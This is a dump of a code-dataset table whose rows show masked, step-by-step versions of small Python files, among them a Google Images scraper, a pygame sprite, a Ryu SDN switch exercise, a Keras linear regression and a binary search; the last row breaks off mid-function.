index (int64, 0 to 10k) | blob_id (stringlengths 40) | step-1 (stringlengths 13 to 984k) | step-2 (stringlengths 6 to 1.23M, ⌀) | step-3 (stringlengths 15 to 1.34M, ⌀) | step-4 (stringlengths 30 to 1.34M, ⌀) | step-5 (stringlengths 64 to 1.2M, ⌀) | step-ids (sequencelengths 1 to 5) |
---|---|---|---|---|---|---|---|
1,600 | fa02fb701b59728671a7e87147adaeb33422dcdb | <mask token>
| {'ivy': {'svm': ({'kernel': 'rbf', 'C': 10.0}, 0.03448275862068966,
0.03508771929824561), 'tuned_ensemble': ({'svm__C': 100000.0,
'rf__n_estimators': 101, 'cart__min_samples_leaf': 7,
'knn__n_neighbors': 2, 'rf__random_state': 1542, 'cart__max_depth': 33,
'cart__max_features': 0.3571428571428572, 'svm__kernel': 'sigmoid',
'rf__max_leaf_nodes': 2, 'rf__min_samples_split': 11,
'cart__random_state': 1542, 'nb__priors': None, 'knn__weights':
'uniform', 'rf__min_samples_leaf': 16, 'rf__max_features':
0.439795918367347, 'cart__min_samples_split': 18}, 0.2891566265060241,
0.34146341463414637), 'nb': ({'priors': None}, 0.3529411764705882,
0.3529411764705882), 'best_param_ensemble': ({}, 0.2891566265060241,
0.2988505747126437), 'rf': ({'min_samples_split': 17,
'min_samples_leaf': 1, 'n_estimators': 61, 'random_state': 1542,
'max_leaf_nodes': 46, 'max_features': 0.9448979591836735},
0.27083333333333337, 0.380952380952381), 'cart': ({'max_depth': 50,
'random_state': 1542, 'max_features': 0.19183673469387758,
'min_samples_split': 13, 'min_samples_leaf': 5}, 0.3119266055045872,
0.2105263157894737), 'knn': ({'n_neighbors': 8, 'weights': 'uniform'},
0.23529411764705882, 0.23749999999999996)}}
| {'ivy': {'svm': ({'kernel': 'rbf', 'C': 10.0}, 0.034482758620689662, 0.035087719298245612), 'tuned_ensemble': ({'svm__C': 100000.0, 'rf__n_estimators': 101, 'cart__min_samples_leaf': 7, 'knn__n_neighbors': 2, 'rf__random_state': 1542, 'cart__max_depth': 33, 'cart__max_features': 0.35714285714285721, 'svm__kernel': 'sigmoid', 'rf__max_leaf_nodes': 2, 'rf__min_samples_split': 11, 'cart__random_state': 1542, 'nb__priors': None, 'knn__weights': 'uniform', 'rf__min_samples_leaf': 16, 'rf__max_features': 0.43979591836734699, 'cart__min_samples_split': 18}, 0.28915662650602408, 0.34146341463414637), 'nb': ({'priors': None}, 0.3529411764705882, 0.3529411764705882), 'best_param_ensemble': ({}, 0.28915662650602408, 0.2988505747126437), 'rf': ({'min_samples_split': 17, 'min_samples_leaf': 1, 'n_estimators': 61, 'random_state': 1542, 'max_leaf_nodes': 46, 'max_features': 0.94489795918367347}, 0.27083333333333337, 0.38095238095238099), 'cart': ({'max_depth': 50, 'random_state': 1542, 'max_features': 0.19183673469387758, 'min_samples_split': 13, 'min_samples_leaf': 5}, 0.31192660550458717, 0.2105263157894737), 'knn': ({'n_neighbors': 8, 'weights': 'uniform'}, 0.23529411764705882, 0.23749999999999996)}} | null | null | [
0,
1,
2
] |
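
Row 1,600 stores per-classifier tuning results. A minimal sketch for reading such a dict, assuming (this is an assumption, not stated in the row) that each value is a (best_params, score_a, score_b) tuple:

```python
# Rank classifiers by their second score; the meaning of the two scores
# is not stated in the row itself, so treat this as illustrative only.
results = {
    'svm': ({'kernel': 'rbf', 'C': 10.0}, 0.0345, 0.0351),
    'nb': ({'priors': None}, 0.3529, 0.3529),
    'knn': ({'n_neighbors': 8, 'weights': 'uniform'}, 0.2353, 0.2375),
}
for name, (params, score_a, score_b) in sorted(
        results.items(), key=lambda kv: kv[1][2], reverse=True):
    print('{:4s} {:.3f} {:.3f} {}'.format(name, score_a, score_b, params))
```
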
1,601 | 02ffdd1c03cc20883eddc691fc841022b4ff40fd | <mask token>
def download_images(links, name):
dir_name = name.replace(' ', '_')
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, '{:06}.png'.format(i))
ulib.urlretrieve(img_link, img_path)
<mask token>
| <mask token>
def find_links(name):
name = name.replace(' ', '+')
url_str = (
'https://www.google.com/search?ei=1m7NWePfFYaGmQG51q7IBg&hl=en&q={}' +
'\\&tbm=isch&ved=0ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ&start={}'
+
'\\&yv=2&vet=10ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ.1m7NWePfFYaGmQG51q7IBg'
+ '\\.i&ijn=1&asearch=ichunk&async=_id:rg_s,_pms:s')
headers = {'User-Agent': 'Chrome/65.0.3325.162 Safari/537.36',
'Content-Type': 'application/json'}
url_str = url_str.format(name, 0)
print(url_str)
request = ulib.Request(url_str, None, headers)
json_str = ulib.urlopen(request).read()
json_str = json.loads(json_str)
soup = Bsoup(json_str[1][1], 'lxml')
soup_imgs = soup.find_all('img')
img_links = [img['src'] for img in soup_imgs]
return img_links
def download_images(links, name):
dir_name = name.replace(' ', '_')
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, '{:06}.png'.format(i))
ulib.urlretrieve(img_link, img_path)
<mask token>
| <mask token>
def find_links(name):
name = name.replace(' ', '+')
url_str = (
'https://www.google.com/search?ei=1m7NWePfFYaGmQG51q7IBg&hl=en&q={}' +
'\\&tbm=isch&ved=0ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ&start={}'
+
'\\&yv=2&vet=10ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ.1m7NWePfFYaGmQG51q7IBg'
+ '\\.i&ijn=1&asearch=ichunk&async=_id:rg_s,_pms:s')
headers = {'User-Agent': 'Chrome/65.0.3325.162 Safari/537.36',
'Content-Type': 'application/json'}
url_str = url_str.format(name, 0)
print(url_str)
request = ulib.Request(url_str, None, headers)
json_str = ulib.urlopen(request).read()
json_str = json.loads(json_str)
soup = Bsoup(json_str[1][1], 'lxml')
soup_imgs = soup.find_all('img')
img_links = [img['src'] for img in soup_imgs]
return img_links
def download_images(links, name):
dir_name = name.replace(' ', '_')
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, '{:06}.png'.format(i))
ulib.urlretrieve(img_link, img_path)
if __name__ == '__main__':
search_str = 'yoyo'
links = find_links(search_str)
download_images(links, search_str)
    print('downloading images.... done!!!')
| import os
import urllib.request as ulib
import json
from bs4 import BeautifulSoup as Bsoup
def find_links(name):
name = name.replace(' ', '+')
url_str = (
'https://www.google.com/search?ei=1m7NWePfFYaGmQG51q7IBg&hl=en&q={}' +
'\\&tbm=isch&ved=0ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ&start={}'
+
'\\&yv=2&vet=10ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ.1m7NWePfFYaGmQG51q7IBg'
+ '\\.i&ijn=1&asearch=ichunk&async=_id:rg_s,_pms:s')
headers = {'User-Agent': 'Chrome/65.0.3325.162 Safari/537.36',
'Content-Type': 'application/json'}
url_str = url_str.format(name, 0)
print(url_str)
request = ulib.Request(url_str, None, headers)
json_str = ulib.urlopen(request).read()
json_str = json.loads(json_str)
soup = Bsoup(json_str[1][1], 'lxml')
soup_imgs = soup.find_all('img')
img_links = [img['src'] for img in soup_imgs]
return img_links
def download_images(links, name):
dir_name = name.replace(' ', '_')
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, '{:06}.png'.format(i))
ulib.urlretrieve(img_link, img_path)
if __name__ == '__main__':
search_str = 'yoyo'
links = find_links(search_str)
download_images(links, search_str)
    print('downloading images.... done!!!')
| import os
import urllib.request as ulib
import json
from bs4 import BeautifulSoup as Bsoup
def find_links(name):
name = name.replace(" ", "+")
url_str = 'https://www.google.com/search?ei=1m7NWePfFYaGmQG51q7IBg&hl=en&q={}' + \
'\&tbm=isch&ved=0ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ&start={}' + \
'\&yv=2&vet=10ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ.1m7NWePfFYaGmQG51q7IBg' + \
'\.i&ijn=1&asearch=ichunk&async=_id:rg_s,_pms:s'
headers = {"User-Agent": "Chrome/65.0.3325.162 Safari/537.36", "Content-Type": "application/json"}
url_str = url_str.format(name, 0)
print(url_str)
request = ulib.Request(url_str, None, headers)
json_str = ulib.urlopen(request).read()
json_str = json.loads(json_str)
soup = Bsoup(json_str[1][1], 'lxml')
soup_imgs = soup.find_all("img")
img_links = [img["src"] for img in soup_imgs]
return img_links
def download_images(links, name):
dir_name = name.replace(" ", "_")
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, "{:06}.png".format(i))
ulib.urlretrieve(img_link, img_path)
if __name__ == "__main__":
search_str = "yoyo"
links = find_links(search_str)
download_images(links, search_str)
print("downloding images.... done!!!") | [
1,
2,
3,
4,
5
] |
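
The scraper in row 1,601 aborts on the first failed download. A hedged hardening sketch (the helper name is illustrative) that skips dead links instead:

```python
import os
import urllib.request as ulib

def download_images_safe(links, name):
    """Like download_images above, but one bad link does not abort the run."""
    dir_name = name.replace(' ', '_')
    os.makedirs(dir_name, exist_ok=True)
    for i, img_link in enumerate(links):
        img_path = os.path.join(dir_name, '{:06}.png'.format(i))
        try:
            ulib.urlretrieve(img_link, img_path)
        except Exception as exc:
            print('skipping {}: {}'.format(img_link, exc))
```
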
1,602 | 290f96bb210a21183fe1e0e53219ad38ba889625 | <mask token>
| default_app_config = 'child.apps.ChildConfig'
| null | null | null | [
0,
1
] |
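
Row 1,602 is a single `default_app_config` line pointing at `child.apps.ChildConfig`. The referenced class is not shown in the row; a minimal `child/apps.py` consistent with it would plausibly look like this:

```python
from django.apps import AppConfig

class ChildConfig(AppConfig):
    # The dotted path 'child.apps.ChildConfig' must resolve to this class.
    name = 'child'
```
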
1,603 | d088aadc4d88267b908c4f6de2928c812ef36739 | <mask token>
class Bunker(Sprite):
<mask token>
<mask token>
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| <mask token>
class Bunker(Sprite):
def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):
"""Initialize the ship and set its starting position"""
super(Bunker, self).__init__()
self.screen = screen
self.images = images
self.image = self.images[18]
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
self.rect.centerx = bunker_x
self.rect.bottom = bunker_y
self.bunker_health = 5
<mask token>
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| <mask token>
class Bunker(Sprite):
def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):
"""Initialize the ship and set its starting position"""
super(Bunker, self).__init__()
self.screen = screen
self.images = images
self.image = self.images[18]
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
self.rect.centerx = bunker_x
self.rect.bottom = bunker_y
self.bunker_health = 5
def update(self):
"""Track the HP of the bunker"""
if self.bunker_health == 0:
self.kill()
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| import pygame
from pygame.sprite import Sprite
import spritesheet
class Bunker(Sprite):
def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):
"""Initialize the ship and set its starting position"""
super(Bunker, self).__init__()
self.screen = screen
self.images = images
self.image = self.images[18]
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
self.rect.centerx = bunker_x
self.rect.bottom = bunker_y
self.bunker_health = 5
def update(self):
"""Track the HP of the bunker"""
if self.bunker_health == 0:
self.kill()
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| import pygame
from pygame.sprite import Sprite
import spritesheet
class Bunker(Sprite):
def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):
"""Initialize the ship and set its starting position"""
super(Bunker, self).__init__()
self.screen = screen
self.images = images
self.image = self.images[18]
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
# Start each new bunker at the bottom of the screen
self.rect.centerx = bunker_x
self.rect.bottom = bunker_y
# Store a decimal value for the ship's center.
#self.center = float(self.rect.centerx)
self.bunker_health = 5
def update(self):
"""Track the HP of the bunker"""
if self.bunker_health == 0:
self.kill()
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| [
2,
3,
4,
5,
6
] |
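
A hypothetical usage sketch for the `Bunker` sprite in row 1,603. The dummy surfaces stand in for the real sprite-sheet images, and `ai_settings` is passed as None because `__init__` never reads it; the `Bunker` class from the row is assumed to be in scope.

```python
import pygame

pygame.init()
screen = pygame.display.set_mode((800, 600))
images = [pygame.Surface((44, 32)) for _ in range(19)]  # index 18 is the one used

bunkers = pygame.sprite.Group(Bunker(None, 200, 550, screen, images))
bunkers.update()                 # removes any bunker whose bunker_health hit 0
for bunker in bunkers:
    bunker.blitme()
pygame.display.flip()
```
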
1,604 | 02ab822dacb26d623a474fa45ebb034f9c1291b8 | <mask token>
| <mask token>
print(a, type(a))
print(a.attr('href'))
print(a.attr.href)
| <mask token>
html = """
<div id="container">
<ul class="list">
<li class="item-0">first item</li>
<li class="item-1"><a href="link2.html">second item</a></li>
<li class="item-0 active"><a href="link3.html">third item</a></li>
<li class="item-1 active"><a href="link4.html">fourth item</a></li>
<li class="item-0"><a href="link5.html">fifth item</a></li>
</ul>
</div>
"""
doc = pq(html)
a = doc('.item-0.active a')
print(a, type(a))
print(a.attr('href'))
print(a.attr.href)
| from pyquery import PyQuery as pq
html = """
<div id="container">
<ul class="list">
<li class="item-0">first item</li>
<li class="item-1"><a href="link2.html">second item</a></li>
<li class="item-0 active"><a href="link3.html">third item</a></li>
<li class="item-1 active"><a href="link4.html">fourth item</a></li>
<li class="item-0"><a href="link5.html">fifth item</a></li>
</ul>
</div>
"""
doc = pq(html)
a = doc('.item-0.active a')
print(a, type(a))
print(a.attr('href'))
print(a.attr.href)
| # coding: utf-8
from pyquery import PyQuery as pq
html = '''
<div id="container">
<ul class="list">
<li class="item-0">first item</li>
<li class="item-1"><a href="link2.html">second item</a></li>
<li class="item-0 active"><a href="link3.html">third item</a></li>
<li class="item-1 active"><a href="link4.html">fourth item</a></li>
<li class="item-0"><a href="link5.html">fifth item</a></li>
</ul>
</div>
'''
# Get attributes
# Method 1
doc = pq(html)
a = doc('.item-0.active a')
print(a, type(a))
print(a.attr('href'))
# Method 2
print(a.attr.href)
| [
0,
1,
2,
3,
4
] |
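
Row 1,604 reads one attribute from a single match. When a selector matches several nodes, PyQuery's `.items()` yields one wrapper per node; a self-contained sketch:

```python
from pyquery import PyQuery as pq

doc = pq('<ul><li class="a"><a href="1.html">x</a></li>'
         '<li class="b"><a href="2.html">y</a></li></ul>')
for a in doc('li a').items():
    print(a.text(), a.attr('href'))
```
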
1,605 | f7afd08fb8316e44c314d17ef382b98dde7eef91 | <mask token>
| <mask token>
def jindutiao(jindu, zonge):
ret = jindu / zonge * 100
r = '\r%s%d%%' % ('=' * jindu, ret)
sys.stdout.write(r)
sys.stdout.flush()
<mask token>
| <mask token>
def jindutiao(jindu, zonge):
ret = jindu / zonge * 100
r = '\r%s%d%%' % ('=' * jindu, ret)
sys.stdout.write(r)
sys.stdout.flush()
if __name__ == '__main__':
for i in range(101):
time.sleep(0.1)
jindutiao(i, 100)
| import time
import sys
def jindutiao(jindu, zonge):
ret = jindu / zonge * 100
r = '\r%s%d%%' % ('=' * jindu, ret)
sys.stdout.write(r)
sys.stdout.flush()
if __name__ == '__main__':
for i in range(101):
time.sleep(0.1)
jindutiao(i, 100)
| #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: Yuan
import time
import sys
def jindutiao(jindu,zonge):
ret = (jindu/zonge)*100
r = "\r%s%d%%"%("="*jindu,ret)
sys.stdout.write(r)
sys.stdout.flush()
if __name__ =="__main__":
for i in range(101):
time.sleep(0.1)
jindutiao(i,100)
| [
0,
1,
2,
3,
4
] |
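
The bar in row 1,605 prints one `=` per completed unit, so it only renders sensibly when the total is about the terminal width (the demo uses 100). A width-independent variant:

```python
import sys

def progress(done, total, width=50):
    # Scale the fill to a fixed width instead of one '=' per unit.
    filled = int(width * done / total)
    sys.stdout.write('\r[%s%s] %3d%%' % ('=' * filled,
                                         ' ' * (width - filled),
                                         100 * done // total))
    sys.stdout.flush()
```
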
1,606 | 7620ff333422d0354cc41c2a66444c3e8a0c011f | <mask token>
| <mask token>
class NameSearch(forms.Form):
<mask token>
| <mask token>
class NameSearch(forms.Form):
name = forms.CharField(label='Search By Name')
| from django import forms
from django.core import validators
class NameSearch(forms.Form):
name = forms.CharField(label='Search By Name')
| null | [
0,
1,
2,
3
] |
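
A hypothetical view consuming `NameSearch` from row 1,606 (the import path and template name are assumptions, not part of the row):

```python
from django.shortcuts import render
from .forms import NameSearch  # assumes the form lives in this app's forms.py

def search(request):
    form = NameSearch(request.GET or None)
    name = form.cleaned_data['name'] if form.is_valid() else ''
    return render(request, 'search.html', {'form': form, 'name': name})
```
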
1,607 | 18b82f83d3bf729eadb2bd5a766f731a2c54a93b | <mask token>
| class Solution:
<mask token>
| class Solution:
def searchRange(self, nums: List[int], target: int) ->List[int]:
res = [-1, -1]
def binary_serach(left, right, target, res):
if left >= right:
return
mid = (left + right) // 2
if nums[mid] == target:
if res[0] == -1:
res[0] = res[1] = mid
else:
res[0] = min(res[0], mid)
res[1] = max(res[1], mid)
if nums[mid] > target:
binary_serach(left, mid, target, res)
elif nums[mid] < target:
binary_serach(mid + 1, right, target, res)
else:
binary_serach(left, mid, target, res)
binary_serach(mid + 1, right, target, res)
if nums:
binary_serach(0, len(nums), target, res)
return res
| null | null | [
0,
1,
2
] |
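
The recursive solution in row 1,607 recurses into both halves whenever it hits the target, so it degrades toward O(n) when the target repeats many times. An equivalent O(log n) formulation using the standard library:

```python
from bisect import bisect_left, bisect_right
from typing import List

def search_range(nums: List[int], target: int) -> List[int]:
    lo = bisect_left(nums, target)
    if lo == len(nums) or nums[lo] != target:
        return [-1, -1]
    return [lo, bisect_right(nums, target) - 1]

print(search_range([5, 7, 7, 8, 8, 10], 8))   # -> [3, 4]
```
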
1,608 | 86d032a3cd67118eb46073c996f1c9a391f8dfe0 | <mask token>
class SimpleSwitch(app_manager.RyuApp):
<mask token>
<mask token>
<mask token>
print('PACKET_OUT...')
| <mask token>
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
<mask token>
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
| <mask token>
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=
haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=
match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,
hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=
ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
| from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=
haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=
match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,
hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=
ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
| from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
class SimpleSwitch(app_manager.RyuApp):
# TODO define OpenFlow 1.0 version for the switch
# add your code here
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(
in_port=in_port,
dl_dst=haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(
datapath=datapath, match=match, cookie=0,
command=ofproto.OFPFC_ADD, idle_timeout=0, hard_timeout=0,
priority=ofproto.OFP_DEFAULT_PRIORITY,
flags=ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
# TODO send modified message out
# add your code here
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
# ignore lldp packet
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
# ignore ipv6 packet
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s", dpid, src, dst, msg.in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
# TODO define the action for output
# add your code here
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
self.logger.info("add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] ", dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
# TODO define the OpenFlow Packet Out
# add your code here
print ("PACKET_OUT...")
| [
1,
3,
4,
5,
6
] |
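
Row 1,608 is a fill-in-the-blanks exercise: the TODO comments (and the otherwise-undefined `actions` variable) mark code the reader is meant to supply. One plausible completion, following the standard Ryu OpenFlow 1.0 simple_switch pattern — an assumption, since the exercise leaves the bodies open. The `...` placeholders elide the unchanged code from the row:

```python
class SimpleSwitch(app_manager.RyuApp):
    OFP_VERSIONS = [ofproto_v1_0.OFP_VERSION]    # TODO: pin OpenFlow 1.0

    def add_flow(self, datapath, in_port, dst, src, actions):
        ...                                      # build mod as in the row
        datapath.send_msg(mod)                   # TODO: send modified message out

    @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
    def _packet_in_handler(self, ev):
        ...                                      # parse msg as in the row
        actions = [datapath.ofproto_parser.OFPActionOutput(out_port)]  # TODO: output action
        ...
        out = datapath.ofproto_parser.OFPPacketOut(                    # TODO: packet out
            datapath=datapath, buffer_id=msg.buffer_id,
            in_port=msg.in_port, actions=actions, data=data)
        datapath.send_msg(out)
```
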
1,609 | e9890fcf9ad2a78b3400f6e4eeb75deac8edcd6a | <mask token>
| <mask token>
if __name__ == '__main__':
sac_gym_test()
| from neodroidagent.entry_points.agent_tests import sac_gym_test
if __name__ == '__main__':
sac_gym_test()
| from neodroidagent.entry_points.agent_tests import sac_gym_test
if __name__ == "__main__":
sac_gym_test()
| null | [
0,
1,
2,
3
] |
1,610 | c8fecb6bfbd39e7a82294c9e0f9e5eaf659b7fed | <mask token>
| <mask token>
model.compile(optimizer='sgd', loss='mean_squared_error')
<mask token>
model.fit(xs, ys, epochs=500)
<mask token>
print(model.predict(dataIn, 1, 1))
| <mask token>
model = keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])
model.compile(optimizer='sgd', loss='mean_squared_error')
xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)
ys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)
model.fit(xs, ys, epochs=500)
dataIn = np.array([10.0], dtype=float)
print(model.predict(dataIn, 1, 1))
| import numpy as np
import keras
model = keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])
model.compile(optimizer='sgd', loss='mean_squared_error')
xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)
ys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)
model.fit(xs, ys, epochs=500)
dataIn = np.array([10.0], dtype=float)
print(model.predict(dataIn, 1, 1))
| # Exercise 1 - linear.py
import numpy as np
import keras
# Build the model
model = keras.Sequential([keras.layers.Dense(units=1,input_shape=[1])])
# Set the loss and optimizer function
model.compile(optimizer='sgd', loss='mean_squared_error')
# Initialize input data
xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)
ys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)
# Fit the model
model.fit(xs, ys, epochs=500)
# Prediction
dataIn = np.array([10.0], dtype=float)
print(model.predict(dataIn,1,1)) | [
0,
1,
2,
3,
4
] |
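
A network-free sanity check for row 1,610: the training pairs lie exactly on y = 3x + 1, so a converged model should return approximately 31 for an input of 10.

```python
import numpy as np

xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0])
ys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0])
slope, intercept = np.polyfit(xs, ys, 1)          # least-squares line fit
print(slope, intercept, slope * 10.0 + intercept)  # ~3.0 ~1.0 ~31.0
```
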
1,611 | a55daebd85002640db5e08c2cf6d3e937b883f01 | <mask token>
| <mask token>
def maximization(X, g):
"""
Returns: pi, m, S, or None, None, None on failure
"""
if type(X) is not np.ndarray or len(X.shape) != 2:
